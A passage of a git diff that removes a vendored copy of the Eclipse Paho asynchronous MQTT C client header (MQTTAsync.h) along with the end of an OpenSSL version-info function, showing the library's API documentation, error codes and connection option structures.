-#if defined(OPENSSL)
-	libinfo[i].name = "OpenSSL version";
-	libinfo[i++].value = SSLeay_version(SSLEAY_VERSION);
-
-	libinfo[i].name = "OpenSSL flags";
-	libinfo[i++].value = SSLeay_version(SSLEAY_CFLAGS);
-
-	libinfo[i].name = "OpenSSL build timestamp";
-	libinfo[i++].value = SSLeay_version(SSLEAY_BUILT_ON);
-
-	libinfo[i].name = "OpenSSL platform";
-	libinfo[i++].value = SSLeay_version(SSLEAY_PLATFORM);
-
-	libinfo[i].name = "OpenSSL directory";
-	libinfo[i++].value = SSLeay_version(SSLEAY_DIR);
-#endif
-	libinfo[i].name = NULL;
-	libinfo[i].value = NULL;
-	return libinfo;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTAsync.h b/thirdparty/paho.mqtt.c/src/MQTTAsync.h
deleted file mode 100644
index e124b9e..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTAsync.h
+++ /dev/null
@@ -1,1728 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation
- *    Ian Craggs, Allan Stockdill-Mander - SSL connections
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - fix for bug 444103 - success/failure callbacks not invoked
- *    Ian Craggs - automatic reconnect and offline buffering (send while disconnected)
- *    Ian Craggs - binary will message
- *    Ian Craggs - binary password
- *    Ian Craggs - remove const on eyecatchers #168
- *******************************************************************************/
-
-/********************************************************************/
-
-/**
- * @cond MQTTAsync_main
- * @mainpage Asynchronous MQTT client library for C
- *
- * &copy; Copyright IBM Corp. 2009, 2017
- *
- * @brief An Asynchronous MQTT client library for C.
- *
- * An MQTT client application connects to MQTT-capable servers.
- * A typical client is responsible for collecting information from a telemetry
- * device and publishing the information to the server. It can also subscribe
- * to topics, receive messages, and use this information to control the
- * telemetry device.
- *
- * MQTT clients implement the published MQTT v3 protocol. You can write your own
- * API to the MQTT protocol using the programming language and platform of your
- * choice. This can be time-consuming and error-prone.
- *
- * To simplify writing MQTT client applications, this library encapsulates
- * the MQTT v3 protocol for you. Using this library enables a fully functional
- * MQTT client application to be written in a few lines of code.
- * The information presented here documents the API provided
- * by the Asynchronous MQTT Client library for C.
- *
- * <b>Using the client</b><br>
- * Applications that use the client library typically use a similar structure:
- * <ul>
- * <li>Create a client object</li>
- * <li>Set the options to connect to an MQTT server</li>
- * <li>Set up callback functions</li>
- * <li>Connect the client to an MQTT server</li>
- * <li>Subscribe to any topics the client needs to receive</li>
- * <li>Repeat until finished:</li>
- *     <ul>
- *     <li>Publish any messages the client needs to</li>
- *     <li>Handle any incoming messages</li>
- *     </ul>
- * <li>Disconnect the client</li>
- * <li>Free any memory being used by the client</li>
- * </ul>
- * Some simple examples are shown here:
- * <ul>
- * <li>@ref publish</li>
- * <li>@ref subscribe</li>
- * </ul>
- * Additional information about important concepts is provided here:
- * <ul>
- * <li>@ref async</li>
- * <li>@ref wildcard</li>
- * <li>@ref qos</li>
- * <li>@ref tracing</li>
- * <li>@ref auto_reconnect</li>
- * <li>@ref offline_publish</li>
- * </ul>
- * @endcond
- */
-
-
-/*
-/// @cond EXCLUDE
-*/
-#if defined(__cplusplus)
- extern "C" {
-#endif
-
-#if !defined(MQTTASYNC_H)
-#define MQTTASYNC_H
-
-#if defined(WIN32) || defined(WIN64)
-  #define DLLImport __declspec(dllimport)
-  #define DLLExport __declspec(dllexport)
-#else
-  #define DLLImport extern
-  #define DLLExport  __attribute__ ((visibility ("default")))
-#endif
-
-#include <stdio.h>
-/*
-/// @endcond
-*/
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTClientPersistence.h"
-#endif
-
-/**
- * Return code: No error. Indicates successful completion of an MQTT client
- * operation.
- */
-#define MQTTASYNC_SUCCESS 0
-/**
- * Return code: A generic error code indicating the failure of an MQTT client
- * operation.
- */
-#define MQTTASYNC_FAILURE -1
-
-/* error code -2 is MQTTAsync_PERSISTENCE_ERROR */
-
-#define MQTTASYNC_PERSISTENCE_ERROR -2
-
-/**
- * Return code: The client is disconnected.
- */
-#define MQTTASYNC_DISCONNECTED -3
-/**
- * Return code: The maximum number of messages allowed to be simultaneously
- * in-flight has been reached.
- */
-#define MQTTASYNC_MAX_MESSAGES_INFLIGHT -4
-/**
- * Return code: An invalid UTF-8 string has been detected.
- */
-#define MQTTASYNC_BAD_UTF8_STRING -5
-/**
- * Return code: A NULL parameter has been supplied when this is invalid.
- */
-#define MQTTASYNC_NULL_PARAMETER -6
-/**
- * Return code: The topic has been truncated (the topic string includes
- * embedded NULL characters). String functions will not access the full topic.
- * Use the topic length value to access the full topic.
- */
-#define MQTTASYNC_TOPICNAME_TRUNCATED -7
-/**
- * Return code: A structure parameter does not have the correct eyecatcher
- * and version number.
- */
-#define MQTTASYNC_BAD_STRUCTURE -8
-/**
- * Return code: A qos parameter is not 0, 1 or 2
- */
-#define MQTTASYNC_BAD_QOS -9
-/**
- * Return code: All 65535 MQTT msgids are being used
- */
-#define MQTTASYNC_NO_MORE_MSGIDS -10
-/**
- * Return code: the request is being discarded when not complete
- */
-#define MQTTASYNC_OPERATION_INCOMPLETE -11
-/**
- * Return code: no more messages can be buffered
- */
-#define MQTTASYNC_MAX_BUFFERED_MESSAGES -12
-/**
- * Return code: Attempting SSL connection using non-SSL version of library
- */
-#define MQTTASYNC_SSL_NOT_SUPPORTED -13
-
-/**
- * Default MQTT version to connect with.  Use 3.1.1 then fall back to 3.1
- */
-#define MQTTVERSION_DEFAULT 0
-/**
- * MQTT version to connect with: 3.1
- */
-#define MQTTVERSION_3_1 3
-/**
- * MQTT version to connect with: 3.1.1
- */
-#define MQTTVERSION_3_1_1 4
-/**
- * Bad return code from subscribe, as defined in the 3.1.1 specification
- */
-#define MQTT_BAD_SUBSCRIBE 0x80
-
-
-/**
- *  Initialization options
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTG. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** 1 = we do openssl init, 0 = leave it to the application */
-	int do_openssl_init;
-} MQTTAsync_init_options;
-
-#define MQTTAsync_init_options_initializer { {'M', 'Q', 'T', 'G'}, 0, 0 }
-
-/**
- * Global init of mqtt library. Call once on program start to set global behaviour.
- * handle_openssl_init - if mqtt library should handle openssl init (1) or rely on the caller to init it before using mqtt (0)
- */
-DLLExport void MQTTAsync_global_init(MQTTAsync_init_options* inits);
-
-/**
- * A handle representing an MQTT client. A valid client handle is available
- * following a successful call to MQTTAsync_create().
- */
-typedef void* MQTTAsync;
-/**
- * A value representing an MQTT message. A token is returned to the
- * client application when a message is published. The token can then be used to
- * check that the message was successfully delivered to its destination (see
- * MQTTAsync_publish(),
- * MQTTAsync_publishMessage(),
- * MQTTAsync_deliveryComplete(), and
- * MQTTAsync_getPendingTokens()).
- */
-typedef int MQTTAsync_token;
-
-/**
- * A structure representing the payload and attributes of an MQTT message. The
- * message topic is not part of this structure (see MQTTAsync_publishMessage(),
- * MQTTAsync_publish(), MQTTAsync_receive(), MQTTAsync_freeMessage()
- * and MQTTAsync_messageArrived()).
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTM. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** The length of the MQTT message payload in bytes. */
-	int payloadlen;
-	/** A pointer to the payload of the MQTT message. */
-	void* payload;
-	/**
-     * The quality of service (QoS) assigned to the message.
-     * There are three levels of QoS:
-     * <DL>
-     * <DT><B>QoS0</B></DT>
-     * <DD>Fire and forget - the message may not be delivered</DD>
-     * <DT><B>QoS1</B></DT>
-     * <DD>At least once - the message will be delivered, but may be
-     * delivered more than once in some circumstances.</DD>
-     * <DT><B>QoS2</B></DT>
-     * <DD>Once and one only - the message will be delivered exactly once.</DD>
-     * </DL>
-     */
-	int qos;
-	/**
-     * The retained flag serves two purposes depending on whether the message
-     * it is associated with is being published or received.
-     *
-     * <b>retained = true</b><br>
-     * For messages being published, a true setting indicates that the MQTT
-     * server should retain a copy of the message. The message will then be
-     * transmitted to new subscribers to a topic that matches the message topic.
-     * For subscribers registering a new subscription, the flag being true
-     * indicates that the received message is not a new one, but one that has
-     * been retained by the MQTT server.
-     *
-     * <b>retained = false</b> <br>
-     * For publishers, this ndicates that this message should not be retained
-     * by the MQTT server. For subscribers, a false setting indicates this is
-     * a normal message, received as a result of it being published to the
-     * server.
-     */
-	int retained;
-	/**
-      * The dup flag indicates whether or not this message is a duplicate.
-      * It is only meaningful when receiving QoS1 messages. When true, the
-      * client application should take appropriate action to deal with the
-      * duplicate message.
-      */
-	int dup;
-	/** The message identifier is normally reserved for internal use by the
-      * MQTT client and server.
-      */
-	int msgid;
-} MQTTAsync_message;
-
-#define MQTTAsync_message_initializer { {'M', 'Q', 'T', 'M'}, 0, 0, NULL, 0, 0, 0, 0 }
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * receipt of messages. The function is registered with the client library by
- * passing it as an argument to MQTTAsync_setCallbacks(). It is
- * called by the client library when a new message that matches a client
- * subscription has been received from the server. This function is executed on
- * a separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param topicName The topic associated with the received message.
- * @param topicLen The length of the topic if there are one
- * more NULL characters embedded in <i>topicName</i>, otherwise <i>topicLen</i>
- * is 0. If <i>topicLen</i> is 0, the value returned by <i>strlen(topicName)</i>
- * can be trusted. If <i>topicLen</i> is greater than 0, the full topic name
- * can be retrieved by accessing <i>topicName</i> as a byte array of length
- * <i>topicLen</i>.
- * @param message The MQTTAsync_message structure for the received message.
- * This structure contains the message payload and attributes.
- * @return This function must return a boolean value indicating whether or not
- * the message has been safely received by the client application. Returning
- * true indicates that the message has been successfully handled.
- * Returning false indicates that there was a problem. In this
- * case, the client library will reinvoke MQTTAsync_messageArrived() to
- * attempt to deliver the message to the application again.
- */
-typedef int MQTTAsync_messageArrived(void* context, char* topicName, int topicLen, MQTTAsync_message* message);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of delivery of messages to the server. The function is
- * registered with the client library by passing it as an argument to MQTTAsync_setCallbacks().
- * It is called by the client library after the client application has
- * published a message to the server. It indicates that the necessary
- * handshaking and acknowledgements for the requested quality of service (see
- * MQTTAsync_message.qos) have been completed. This function is executed on a
- * separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param token The ::MQTTAsync_token associated with
- * the published message. Applications can check that all messages have been
- * correctly published by matching the tokens returned from calls to
- * MQTTAsync_send() and MQTTAsync_sendMessage() with the tokens passed
- * to this callback.
- */
-typedef void MQTTAsync_deliveryComplete(void* context, MQTTAsync_token token);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the loss of connection to the server. The function is
- * registered with the client library by passing it as an argument to
- * MQTTAsync_setCallbacks(). It is called by the client library if the client
- * loses its connection to the server. The client application must take
- * appropriate action, such as trying to reconnect or reporting the problem.
- * This function is executed on a separate thread to the one on which the
- * client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTAsync_connectionLost(void* context, char* cause);
-
-
-/**
- * This is a callback function, which will be called when the client
- * library successfully connects.  This is superfluous when the connection
- * is made in response to a MQTTAsync_connect call, because the onSuccess
- * callback can be used.  It is intended for use when automatic reconnect
- * is enabled, so that when a reconnection attempt succeeds in the background,
- * the application is notified and can take any required actions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTAsync_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTAsync_connected(void* context, char* cause);
-
-
-
-/** The data returned on completion of an unsuccessful API call in the response callback onFailure. */
-typedef struct
-{
-	/** A token identifying the failed request. */
-	MQTTAsync_token token;
-	/** A numeric code identifying the error. */
-	int code;
-	/** Optional text explaining the error. Can be NULL. */
-	const char *message;
-} MQTTAsync_failureData;
-
-/** The data returned on completion of a successful API call in the response callback onSuccess. */
-typedef struct
-{
-	/** A token identifying the successful request. Can be used to refer to the request later. */
-	MQTTAsync_token token;
-	/** A union of the different values that can be returned for subscribe, unsubscribe and publish. */
-	union
-	{
-		/** For subscribe, the granted QoS of the subscription returned by the server. */
-		int qos;
-		/** For subscribeMany, the list of granted QoSs of the subscriptions returned by the server. */
-		int* qosList;
-		/** For publish, the message being sent to the server. */
-		struct
-		{
-			MQTTAsync_message message;
-			char* destinationName;
-		} pub;
-		/* For connect, the server connected to, MQTT version used, and sessionPresent flag */
-		struct
-		{
-			char* serverURI;
-			int MQTTVersion;
-			int sessionPresent;
-		} connect;
-	} alt;
-} MQTTAsync_successData;
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the successful completion of an API call. The function is
- * registered with the client library by passing it as an argument in
- * ::MQTTAsync_responseOptions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * ::MQTTAsync_responseOptions, which contains any application-specific context.
- * @param response Any success data associated with the API completion.
- */
-typedef void MQTTAsync_onSuccess(void* context, MQTTAsync_successData* response);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the unsuccessful completion of an API call. The function is
- * registered with the client library by passing it as an argument in
- * ::MQTTAsync_responseOptions.
- * @param context A pointer to the <i>context</i> value originally passed to
- * ::MQTTAsync_responseOptions, which contains any application-specific context.
- * @param response Any failure data associated with the API completion.
- */
-typedef void MQTTAsync_onFailure(void* context,  MQTTAsync_failureData* response);
-
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTR */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/**
-    * A pointer to a callback function to be called if the API call successfully
-    * completes.  Can be set to NULL, in which case no indication of successful
-    * completion will be received.
-    */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-    * A pointer to a callback function to be called if the API call fails.
-    * Can be set to NULL, in which case no indication of unsuccessful
-    * completion will be received.
-    */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	* A pointer to any application-specific context. The
-    * the <i>context</i> pointer is passed to success or failure callback functions to
-    * provide access to the context information in the callback.
-    */
-	void* context;
-	MQTTAsync_token token;   /* output */
-} MQTTAsync_responseOptions;
-
-#define MQTTAsync_responseOptions_initializer { {'M', 'Q', 'T', 'R'}, 0, NULL, NULL, 0, 0 }
-
-
-/**
- * This function sets the global callback functions for a specific client.
- * If your client application doesn't use a particular callback, set the
- * relevant parameter to NULL. Any necessary message acknowledgements and
- * status communications are handled in the background without any intervention
- * from the client application.  If you do not set a messageArrived callback
- * function, you will not be notified of the receipt of any messages as a
- * result of a subscription.
- *
- * <b>Note:</b> The MQTT client must be disconnected when this function is
- * called.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param cl A pointer to an MQTTAsync_connectionLost() callback
- * function. You can set this to NULL if your application doesn't handle
- * disconnections.
- * @param ma A pointer to an MQTTAsync_messageArrived() callback
- * function.  You can set this to NULL if your application doesn't handle
- * receipt of messages.
- * @param dc A pointer to an MQTTAsync_deliveryComplete() callback
- * function. You can set this to NULL if you do not want to check
- * for successful delivery.
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_setCallbacks(MQTTAsync handle, void* context, MQTTAsync_connectionLost* cl,
-									MQTTAsync_messageArrived* ma, MQTTAsync_deliveryComplete* dc);
-
-
-/**
- * Sets the MQTTAsync_connected() callback function for a client.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param co A pointer to an MQTTAsync_connected() callback
- * function.  NULL removes the callback setting.
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_setConnected(MQTTAsync handle, void* context, MQTTAsync_connected* co);
-
-
-/**
- * Reconnects a client with the previously used connect options.  Connect
- * must have previously been called for this to work.
- * @param handle A valid client handle from a successful call to
- * MQTTAsync_create().
- * @return ::MQTTASYNC_SUCCESS if the callbacks were correctly set,
- * ::MQTTASYNC_FAILURE if an error occurred.
- */
-DLLExport int MQTTAsync_reconnect(MQTTAsync handle);
-
-
-/**
- * This function creates an MQTT client ready for connection to the
- * specified server and using the specified persistent storage (see
- * MQTTAsync_persistence). See also MQTTAsync_destroy().
- * @param handle A pointer to an ::MQTTAsync handle. The handle is
- * populated with a valid client reference following a successful return from
- * this function.
- * @param serverURI A null-terminated string specifying the server to
- * which the client will connect. It takes the form <i>protocol://host:port</i>.
- * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
- * specify either an IP address or a host name. For instance, to connect to
- * a server running on the local machines with the default MQTT port, specify
- * <i>tcp://localhost:1883</i>.
- * @param clientId The client identifier passed to the server when the
- * client connects to it. It is a null-terminated UTF-8 encoded string.
- * @param persistence_type The type of persistence to be used by the client:
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_NONE: Use in-memory persistence. If the device or
- * system on which the client is running fails or is switched off, the current
- * state of any in-flight messages is lost and some messages may not be
- * delivered even at QoS1 and QoS2.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_DEFAULT: Use the default (file system-based)
- * persistence mechanism. Status about in-flight messages is held in persistent
- * storage and provides some protection against message loss in the case of
- * unexpected failure.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_USER: Use an application-specific persistence
- * implementation. Using this type of persistence gives control of the
- * persistence mechanism to the application. The application has to implement
- * the MQTTClient_persistence interface.
- * @param persistence_context If the application uses
- * ::MQTTCLIENT_PERSISTENCE_NONE persistence, this argument is unused and should
- * be set to NULL. For ::MQTTCLIENT_PERSISTENCE_DEFAULT persistence, it
- * should be set to the location of the persistence directory (if set
- * to NULL, the persistence directory used is the working directory).
- * Applications that use ::MQTTCLIENT_PERSISTENCE_USER persistence set this
- * argument to point to a valid MQTTClient_persistence structure.
- * @return ::MQTTASYNC_SUCCESS if the client is successfully created, otherwise
- * an error code is returned.
- */
-DLLExport int MQTTAsync_create(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context);
-
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQCO. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** Whether to allow messages to be sent when the client library is not connected. */
-	int sendWhileDisconnected;
-	/** the maximum number of messages allowed to be buffered while not connected. */
-	int maxBufferedMessages;
-} MQTTAsync_createOptions;
-
-#define MQTTAsync_createOptions_initializer { {'M', 'Q', 'C', 'O'}, 0, 0, 100 }
-
-
-DLLExport int MQTTAsync_createWithOptions(MQTTAsync* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context, MQTTAsync_createOptions* options);
-
-/**
- * MQTTAsync_willOptions defines the MQTT "Last Will and Testament" (LWT) settings for
- * the client. In the event that a client unexpectedly loses its connection to
- * the server, the server publishes the LWT message to the LWT topic on
- * behalf of the client. This allows other clients (subscribed to the LWT topic)
- * to be made aware that the client has disconnected. To enable the LWT
- * function for a specific client, a valid pointer to an MQTTAsync_willOptions
- * structure is passed in the MQTTAsync_connectOptions structure used in the
- * MQTTAsync_connect() call that connects the client to the server. The pointer
- * to MQTTAsync_willOptions can be set to NULL if the LWT function is not
- * required.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTW. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1
-	    0 indicates no binary will message support
-	 */
-	int struct_version;
-	/** The LWT topic to which the LWT message will be published. */
-	const char* topicName;
-	/** The LWT payload. */
-	const char* message;
-	/**
-      * The retained flag for the LWT message (see MQTTAsync_message.retained).
-      */
-	int retained;
-	/**
-      * The quality of service setting for the LWT message (see
-      * MQTTAsync_message.qos and @ref qos).
-      */
-	int qos;
-  /** The LWT payload in binary form. This is only checked and used if the message option is NULL */
-	struct
-	{
-  	int len;            /**< binary payload length */
-		const void* data;  /**< binary payload data */
-	} payload;
-} MQTTAsync_willOptions;
-
-#define MQTTAsync_willOptions_initializer { {'M', 'Q', 'T', 'W'}, 1, NULL, NULL, 0, 0, { 0, NULL } }
-
-#define MQTT_SSL_VERSION_DEFAULT 0
-#define MQTT_SSL_VERSION_TLS_1_0 1
-#define MQTT_SSL_VERSION_TLS_1_1 2
-#define MQTT_SSL_VERSION_TLS_1_2 3
-
-/**
-* MQTTAsync_sslProperties defines the settings to establish an SSL/TLS connection using the
-* OpenSSL library. It covers the following scenarios:
-* - Server authentication: The client needs the digital certificate of the server. It is included
-*   in a store containting trusted material (also known as "trust store").
-* - Mutual authentication: Both client and server are authenticated during the SSL handshake. In
-*   addition to the digital certificate of the server in a trust store, the client will need its own
-*   digital certificate and the private key used to sign its digital certificate stored in a "key store".
-* - Anonymous connection: Both client and server do not get authenticated and no credentials are needed
-*   to establish an SSL connection. Note that this scenario is not fully secure since it is subject to
-*   man-in-the-middle attacks.
-*/
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTS */
-	char struct_id[4];
-	/** The version number of this structure.    Must be 0, or 1 to enable TLS version selection. */
-	int struct_version;
-
-	/** The file in PEM format containing the public digital certificates trusted by the client. */
-	const char* trustStore;
-
-	/** The file in PEM format containing the public certificate chain of the client. It may also include
-	* the client's private key.
-	*/
-	const char* keyStore;
-
-	/** If not included in the sslKeyStore, this setting points to the file in PEM format containing
-	* the client's private key.
-	*/
-	const char* privateKey;
-	/** The password to load the client's privateKey if encrypted. */
-	const char* privateKeyPassword;
-
-	/**
-	* The list of cipher suites that the client will present to the server during the SSL handshake. For a
-	* full explanation of the cipher list format, please see the OpenSSL on-line documentation:
-	* http://www.openssl.org/docs/apps/ciphers.html#CIPHER_LIST_FORMAT
-	* If this setting is ommitted, its default value will be "ALL", that is, all the cipher suites -excluding
-	* those offering no encryption- will be considered.
-	* This setting can be used to set an SSL anonymous connection ("aNULL" string value, for instance).
-	*/
-	const char* enabledCipherSuites;
-
-    /** True/False option to enable verification of the server certificate **/
-    int enableServerCertAuth;
-
-    /** The SSL/TLS version to use. Specify one of MQTT_SSL_VERSION_DEFAULT (0),
-    * MQTT_SSL_VERSION_TLS_1_0 (1), MQTT_SSL_VERSION_TLS_1_1 (2) or MQTT_SSL_VERSION_TLS_1_2 (3).
-    * Only used if struct_version is >= 1.
-    */
-    int sslVersion;
-
-} MQTTAsync_SSLOptions;
-
-#define MQTTAsync_SSLOptions_initializer { {'M', 'Q', 'T', 'S'}, 1, NULL, NULL, NULL, NULL, NULL, 1, MQTT_SSL_VERSION_DEFAULT }
-
-/**
- * MQTTAsync_connectOptions defines several settings that control the way the
- * client connects to an MQTT server.  Default values are set in
- * MQTTAsync_connectOptions_initializer.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTC. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, 1, 2, 3 4 or 5.
-	  * 0 signifies no SSL options and no serverURIs
-	  * 1 signifies no serverURIs
-    * 2 signifies no MQTTVersion
-    * 3 signifies no automatic reconnect options
-    * 4 signifies no binary password option (just string)
-	  */
-	int struct_version;
-	/** The "keep alive" interval, measured in seconds, defines the maximum time
-      * that should pass without communication between the client and the server
-      * The client will ensure that at least one message travels across the
-      * network within each keep alive period.  In the absence of a data-related
-	  * message during the time period, the client sends a very small MQTT
-      * "ping" message, which the server will acknowledge. The keep alive
-      * interval enables the client to detect when the server is no longer
-	  * available without having to wait for the long TCP/IP timeout.
-	  * Set to 0 if you do not want any keep alive processing.
-	  */
-	int keepAliveInterval;
-	/**
-      * This is a boolean value. The cleansession setting controls the behaviour
-      * of both the client and the server at connection and disconnection time.
-      * The client and server both maintain session state information. This
-      * information is used to ensure "at least once" and "exactly once"
-      * delivery, and "exactly once" receipt of messages. Session state also
-      * includes subscriptions created by an MQTT client. You can choose to
-      * maintain or discard state information between sessions.
-      *
-      * When cleansession is true, the state information is discarded at
-      * connect and disconnect. Setting cleansession to false keeps the state
-      * information. When you connect an MQTT client application with
-      * MQTTAsync_connect(), the client identifies the connection using the
-      * client identifier and the address of the server. The server checks
-      * whether session information for this client
-      * has been saved from a previous connection to the server. If a previous
-      * session still exists, and cleansession=true, then the previous session
-      * information at the client and server is cleared. If cleansession=false,
-      * the previous session is resumed. If no previous session exists, a new
-      * session is started.
-	  */
-	int cleansession;
-	/**
-      * This controls how many messages can be in-flight simultaneously.
-	  */
-	int maxInflight;
-	/**
-      * This is a pointer to an MQTTAsync_willOptions structure. If your
-      * application does not make use of the Last Will and Testament feature,
-      * set this pointer to NULL.
-      */
-	MQTTAsync_willOptions* will;
-	/**
-      * MQTT servers that support the MQTT v3.1 protocol provide authentication
-      * and authorisation by user name and password. This is the user name
-      * parameter.
-      */
-	const char* username;
-	/**
-      * MQTT servers that support the MQTT v3.1 protocol provide authentication
-      * and authorisation by user name and password. This is the password
-      * parameter.
-      */
-	const char* password;
-	/**
-      * The time interval in seconds to allow a connect to complete.
-      */
-	int connectTimeout;
-	/**
-	 * The time interval in seconds
-	 */
-	int retryInterval;
-	/**
-      * This is a pointer to an MQTTAsync_SSLOptions structure. If your
-      * application does not make use of SSL, set this pointer to NULL.
-      */
-	MQTTAsync_SSLOptions* ssl;
-	/**
-      * A pointer to a callback function to be called if the connect successfully
-      * completes.  Can be set to NULL, in which case no indication of successful
-      * completion will be received.
-      */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-      * A pointer to a callback function to be called if the connect fails.
-      * Can be set to NULL, in which case no indication of unsuccessful
-      * completion will be received.
-      */
-	MQTTAsync_onFailure* onFailure;
-	/**
-	  * A pointer to any application-specific context. The
-      * the <i>context</i> pointer is passed to success or failure callback functions to
-      * provide access to the context information in the callback.
-      */
-	void* context;
-	/**
-	  * The number of entries in the serverURIs array.
-	  */
-	int serverURIcount;
-	/**
-	  * An array of null-terminated strings specifying the servers to
-      * which the client will connect. Each string takes the form <i>protocol://host:port</i>.
-      * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
-      * specify either an IP address or a domain name. For instance, to connect to
-      * a server running on the local machines with the default MQTT port, specify
-      * <i>tcp://localhost:1883</i>.
-      */
-	char* const* serverURIs;
-	/**
-      * Sets the version of MQTT to be used on the connect.
-      * MQTTVERSION_DEFAULT (0) = default: start with 3.1.1, and if that fails, fall back to 3.1
-      * MQTTVERSION_3_1 (3) = only try version 3.1
-      * MQTTVERSION_3_1_1 (4) = only try version 3.1.1
-	  */
-	int MQTTVersion;
-	/**
-	  * Reconnect automatically in the case of a connection being lost?
-	  */
-	int automaticReconnect;
-	/**
-	  * Minimum retry interval in seconds.  Doubled on each failed retry.
-	  */
-	int minRetryInterval;
-	/**
-	  * Maximum retry interval in seconds.  The doubling stops here on failed retries.
-	  */
-	int maxRetryInterval;
-	/**
-   * Optional binary password.  Only checked and used if the password option is NULL
-   */
-  struct {
-  	int len;            /**< binary password length */
-		const void* data;  /**< binary password data */
-	} binarypwd;
-} MQTTAsync_connectOptions;
-
-
-#define MQTTAsync_connectOptions_initializer { {'M', 'Q', 'T', 'C'}, 5, 60, 1, 10, NULL, NULL, NULL, 30, 0,\
-NULL, NULL, NULL, NULL, 0, NULL, 0, 0, 1, 60, {0, NULL}}
-
-/**
-  * This function attempts to connect a previously-created client (see
-  * MQTTAsync_create()) to an MQTT server using the specified options. If you
-  * want to enable asynchronous message and status notifications, you must call
-  * MQTTAsync_setCallbacks() prior to MQTTAsync_connect().
-  * @param handle A valid client handle from a successful call to
-  * MQTTAsync_create().
-  * @param options A pointer to a valid MQTTAsync_connectOptions
-  * structure.
-  * @return ::MQTTASYNC_SUCCESS if the client connect request was accepted.
-  * If the client was unable to connect to the server, an error code is
-  * returned via the onFailure callback, if set.
-  * Error codes greater than 0 are returned by the MQTT protocol:<br><br>
-  * <b>1</b>: Connection refused: Unacceptable protocol version<br>
-  * <b>2</b>: Connection refused: Identifier rejected<br>
-  * <b>3</b>: Connection refused: Server unavailable<br>
-  * <b>4</b>: Connection refused: Bad user name or password<br>
-  * <b>5</b>: Connection refused: Not authorized<br>
-  * <b>6-255</b>: Reserved for future use<br>
-  */
-DLLExport int MQTTAsync_connect(MQTTAsync handle, const MQTTAsync_connectOptions* options);
-
-
-typedef struct
-{
-	/** The eyecatcher for this structure. Must be MQTD. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1.  0 signifies no SSL options */
-	int struct_version;
-	/**
-      * The client delays disconnection for up to this time (in
-      * milliseconds) in order to allow in-flight message transfers to complete.
-      */
-	int timeout;
-	/**
-    * A pointer to a callback function to be called if the disconnect successfully
-    * completes.  Can be set to NULL, in which case no indication of successful
-    * completion will be received.
-    */
-	MQTTAsync_onSuccess* onSuccess;
-	/**
-    * A pointer to a callback function to be called if the disconnect fails.
